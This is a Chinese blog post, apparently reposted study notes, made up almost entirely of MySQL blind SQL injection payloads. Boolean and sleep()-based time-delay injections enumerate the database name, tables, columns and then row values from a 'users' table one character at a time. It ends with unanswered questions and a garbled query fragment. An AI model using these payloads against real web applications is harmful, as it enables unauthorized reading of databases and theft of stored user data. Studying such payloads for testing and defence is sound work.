盲注代码

最新推荐文章于 2024-10-31 20:49:25 发布

weixin_33875839

最新推荐文章于 2024-10-31 20:49:25 发布

阅读量172

点赞数

文章标签： c# 数据库

原文链接：http://blog.51cto.com/dongxiaoyang/1969574

版权

判断数据库名的长度小于5

and length(database()) = 4

或者：通过返回时间来判断数据库名的长度

and if(length(database()) <5,sleep(10),1) --

猜库名

and ascii(substr(database(),1,1)) >=65 （65为asii值）

猜表的数量

and (select count(table_name) from information_schema.tables where table_schema = database()) =2

第一个表名的长度

and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9

或者：通过返回时间来判断第一个表名的长度

and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>8,sleep(2),1) --

猜第二个表名的长度

and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=9

........

substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)

猜第一个表名的第一个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)) >97

猜第一个表名的第二个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,2)) >97

猜第一个表名的第三个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,3)) >97

...........

猜第二个表名的第一个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 1,1),1,1)) >97

猜第二个表名的第二个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 1,1),2,2)) >97

................

猜第一个表的字段个数

and (select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 0,1)) >1

或者：通过返回时间来猜第一个表的字段个数

and if((select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 0,1)) >1,sleep(2),1)

猜第二个表的字段个数

and (select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 1,1)) >1

.................

猜第一个表的第一个字段长度

and length(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 0,1),1)) > 1

猜第一个表的第二个字段长度

and length(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 1,1),1)) > 1

.........................

猜guestbook表的第一个字段长度

and length(substr((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1),1)) > 1

猜第一个表的第一个字段名的第一个字

and ascii(substr((select column_name from information_schema.columns where table_name= (select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 0,1),1)) >97

猜第一个表的第一个字段名的第二个字

and ascii(substr((select column_name from information_schema.columns where table_name= (select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 1,1),1)) >97

猜第二个表的第一个字段的第一行的字段值

先求它长度

and length(substr((select user_id from users limit 0,1),1)) =1

求它的值

and ascii(substr((select user_id from users limit 0,1),1,1)) >1

怎么查询第二个库？？？？？？？？？？？？？？？？？？？？？？？？？？

information.schema.cshema.name select count(schema_name) from information_schema.schemata =7

怎么查询第二个库里的表？？？？？？？？？？？？？？？？？？？？？？？？？

转载于:https://blog.51cto.com/dongxiaoyang/1969574